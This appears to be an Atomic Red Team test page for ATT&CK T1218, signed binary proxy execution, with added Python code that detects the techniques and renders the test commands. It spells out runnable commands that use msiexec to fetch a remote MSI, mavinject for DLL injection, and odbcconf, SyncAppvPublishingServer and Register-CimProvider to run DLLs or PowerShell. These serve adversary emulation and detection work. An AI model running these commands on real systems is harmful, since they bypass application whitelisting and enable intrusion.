T1218.md

File metadata and controls

91 lines (62 loc) · 4.46 KB

T1218 - Signed Binary Proxy Execution

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.

Msiexec.exe

Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)

  • msiexec.exe /q /i "C:\path\to\file.msi"
  • msiexec.exe /q /i http[:]//site[.]com/file.msi
  • msiexec.exe /y "C:\path\to\file.dll"

Mavinject.exe

Mavinject.exe is a Windows utility (shipped with App-V and Office Click-to-Run, which is why it exists under both paths below) that allows for code execution. Mavinject can be used to inject a DLL into a running process identified by PID. (Citation: Twitter gN3mes1s Status Update MavInject32)

  • "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
  • C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)

Odbcconf.exe

Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to Regsvr32 with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

  • odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)
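The practitioner-side check for the binaries described above (msiexec, mavinject, SyncAppvPublishingServer, odbcconf, plus Register-CimProvider from the atomic tests later on this page) is to look at process-creation telemetry for the argument patterns each one needs to proxy execution. The following is an added example, not code from Atomic Red Team or ATT&CK: it classifies constructed Sysmon Event ID 1-style records (image path and command line) and returns a verdict per record. The "user-writable path" list, the sample records and the placeholder host names are assumptions; legitimate App-V/Office callers of mavinject and routine MSI installs should be baselined before any of this is turned into an alert.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 (process creation) record."""
    image: str          # full path of the new process
    command_line: str   # command line as logged


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Assumption: locations a quiet local MSI install would not normally come
# from on a managed host. Tune to the environment.
USER_WRITABLE = re.compile(r"\\(users|programdata|temp|tmp|appdata)\\", re.I)
# http(s) URLs and UNC paths (\\host\share\...) handed to msiexec.
REMOTE = re.compile(r"(https?://|\\\\[^\\\s]+\\)", re.I)


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a verdict for a proxy-execution pattern, or None if nothing matched."""
    name = _basename(ev.image)
    cl = ev.command_line
    tokens = cl.lower().split()

    if name == "msiexec.exe":
        if "/y" in tokens or "-y" in tokens:
            return "msiexec: DLL registration via /y"
        if REMOTE.search(cl):
            return "msiexec: package fetched from a remote location"
        quiet = any(t in tokens for t in ("/q", "/qn", "/quiet", "-q", "-qn", "-quiet"))
        if quiet and USER_WRITABLE.search(cl):
            return "msiexec: quiet install from a user-writable path"
        return None

    if name in ("mavinject.exe", "mavinject32.exe"):
        if "/injectrunning" in tokens:
            return "mavinject: DLL injection into a running process"
        return None

    if name == "syncappvpublishingserver.exe":
        # The binary forwards its argument into a PowerShell statement; a ';'
        # or '|' in the argument ends that statement so arbitrary code follows.
        if ";" in cl or "|" in cl:
            return "SyncAppvPublishingServer: PowerShell statement injection"
        return None

    if name == "odbcconf.exe":
        if "regsvr" in cl.lower():
            return "odbcconf: DLL loaded via REGSVR"
        if "/f" in tokens or "-f" in tokens:
            return "odbcconf: response file supplied (inspect it for REGSVR)"
        return None

    if name == "register-cimprovider.exe":
        if "-path" in tokens:
            return "Register-CimProvider: DLL loaded via -Path"
        return None

    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (command line, verdict) for every event that matched a pattern."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append((ev.command_line, verdict))
    return hits


# Constructed sample records, not real telemetry; example.com and fileserver
# are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /y "C:\Users\Public\file.dll"'),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 "msiexec.exe /q /i http://example.com/file.msi"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "C:\Program Files\Vendor\setup.msi"'),   # benign
    ProcessEvent(r"C:\Windows\System32\mavinject.exe",
                 r"mavinject.exe 1000 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll"),
    ProcessEvent(r"C:\Windows\System32\SyncAppvPublishingServer.exe",
                 'SyncAppvPublishingServer.exe "n; Start-Process calc.exe"'),
    ProcessEvent(r"C:\Windows\System32\odbcconf.exe",
                 r'odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}'),
    ProcessEvent(r"C:\Windows\SysWow64\Register-CimProvider.exe",
                 r"C:\Windows\SysWow64\Register-CimProvider.exe -Path \\fileserver\share\T1218-2.dll"),
]

if __name__ == "__main__":
    for cmd, verdict in scan(SAMPLE_EVENTS):
        print(f"{verdict:58s} <- {cmd}")
```

Only six of the seven constructed records match; the plain `msiexec /i` from Program Files is deliberately left alone, because flagging every MSI install is how a rule like this gets disabled. The REGSVR and `/INJECTRUNNING` matches are the high-confidence ones; the remaining msiexec verdicts are hunting leads that need parent-process and file-origin context before they mean much.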

Atomic Tests


Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll |
| process_id | PID of process receiving injection | string | 1000 |

Run it with command_prompt!

mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}


Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: Windows

Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |

Run it with command_prompt!

SyncAppvPublishingServer.exe "n; #{powershell_code}"


Atomic Test #3 - Register-CimProvider - Execute evil dll

Executes an arbitrary DLL. Requires at least Windows 8/2012. Note that the DLL can also be served over SMB, i.e. passed as a UNC path.

Supported Platforms: Windows

Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll |

Run it with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
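The three tests above follow the Atomic Red Team convention of a command template with `#{input}` placeholders filled from the input table (defaults, or values the tester overrides). The following is an added example of that rendering step, written here for illustration; it is not Invoke-AtomicRedTeam or any other code from the project. The test names, inputs, defaults and commands are copied from the page; the validation rules and the override values are assumptions. Two checks a tester wants before typing these into a command prompt are built in: the `process_id` default of 1000 is a placeholder, so a non-numeric or unset PID is rejected (pick a PID of a process you own, such as a notepad.exe you launched), and `Path` inputs must be absolute local or UNC paths, which also covers the SMB-served DLL case of test #3.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

PLACEHOLDER = re.compile(r"#\{([A-Za-z0-9_]+)\}")

# The three T1218 tests as defined above: input name -> (type, default), plus
# the command template.
ATOMICS = {
    1: {
        "name": "mavinject - Inject DLL into running process",
        "inputs": {
            "dll_payload": ("Path", r"C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll"),
            "process_id": ("string", "1000"),
        },
        "command": "mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}",
    },
    2: {
        "name": "SyncAppvPublishingServer - Execute arbitrary PowerShell code",
        "inputs": {"powershell_code": ("string", "Start-Process calc.exe")},
        "command": 'SyncAppvPublishingServer.exe "n; #{powershell_code}"',
    },
    3: {
        "name": "Register-CimProvider - Execute evil dll",
        "inputs": {"dll_payload": ("Path", r"C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll")},
        "command": r"C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}",
    },
}


def resolve_inputs(test_no: int, overrides: Optional[Dict[str, str]] = None) -> Dict[str, str]:
    """Merge overrides onto the table defaults; unknown input names are an error."""
    test = ATOMICS[test_no]
    values = {name: default for name, (_, default) in test["inputs"].items()}
    unknown = set(overrides or {}) - set(values)
    if unknown:
        raise KeyError(f"test #{test_no} has no input(s) {sorted(unknown)}")
    values.update(overrides or {})
    return values


def check_inputs(test_no: int, overrides: Optional[Dict[str, str]] = None) -> List[str]:
    """Return a list of problems (empty when the rendered command can work).

    Assumption: these rules are this example's, not the project's."""
    problems = []
    for name, value in resolve_inputs(test_no, overrides).items():
        kind = ATOMICS[test_no]["inputs"][name][0]
        if kind == "Path" and not PureWindowsPath(value).is_absolute():
            problems.append(f"{name}: expected an absolute local or UNC path, got {value!r}")
        if name == "process_id" and not value.isdigit():
            problems.append(f"{name}: expected a numeric PID, got {value!r}")
    return problems


def render(test_no: int, overrides: Optional[Dict[str, str]] = None) -> str:
    """Fill the #{...} placeholders and return the command line to run."""
    problems = check_inputs(test_no, overrides)
    if problems:
        raise ValueError("; ".join(problems))
    values = resolve_inputs(test_no, overrides)
    # A function replacement is used so backslashes in paths are inserted verbatim.
    return PLACEHOLDER.sub(lambda m: values[m.group(1)], ATOMICS[test_no]["command"])


if __name__ == "__main__":
    for no in ATOMICS:
        print(f"#{no} {ATOMICS[no]['name']}\n    {render(no)}")
    # Test #3 with the DLL served from an SMB share (constructed share name).
    print(render(3, {"dll_payload": r"\\fileserver\share\T1218-2.dll"}))
```

With no overrides the renderer reproduces the three commands exactly as printed on this page; the SMB variant of test #3 passes the path check because a UNC path is absolute. Running the rendered commands on a host with endpoint telemetry is the point of the exercise: each one should surface as a process-creation event carrying the argument pattern the test exists to exercise.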